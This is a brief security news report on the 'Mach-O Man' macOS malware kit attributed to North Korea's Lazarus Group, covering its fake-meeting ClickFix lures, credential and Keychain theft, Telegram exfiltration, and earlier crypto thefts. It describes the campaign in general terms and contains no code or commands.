North Korean Lazarus Group Deploys 'Mach-O Man' Malware Targeting Fintech and Crypto Firms

Security researchers have identified a new macOS-specific malware kit, dubbed 'Mach-O Man,' attributed to the North Korea-linked Lazarus Group. The campaign employs advanced social engineering tactics to bypass traditional security controls and gain unauthorized access to corporate infrastructure. The attack vector relies on 'ClickFix' schemes, where victims are lured into fraudulent Zoom or Google Meet calls. Once engaged, users are prompted to execute commands that silently download the malware in the background, allowing attackers to harvest browser credentials, cookies, and macOS Keychain entries. Once the sensitive data is collected, the malware archives the information into zip files and exfiltrates it to the attackers via Telegram. To avoid detection and forensic analysis, the kit utilizes a self-deletion script that removes the entire operation from the system using the 'rm' command, bypassing standard user permissions. The Lazarus Group has a documented history of high-profile thefts, including the 2025 Bybit exchange hack totaling $1.4 billion. More recently, in April, AI-enabled social engineering schemes were used to steal approximately $100,000 from the crypto wallet Zerion after attackers gained access to private keys and logged-in sessions. This expansion of targeting toward traditional businesses alongside fintech firms underscores a growing systemic risk for macOS users in the financial sector. The ability to bypass security controls suggests a need for heightened vigilance regarding third-party meeting invites and the execution of unauthorized command-line scripts.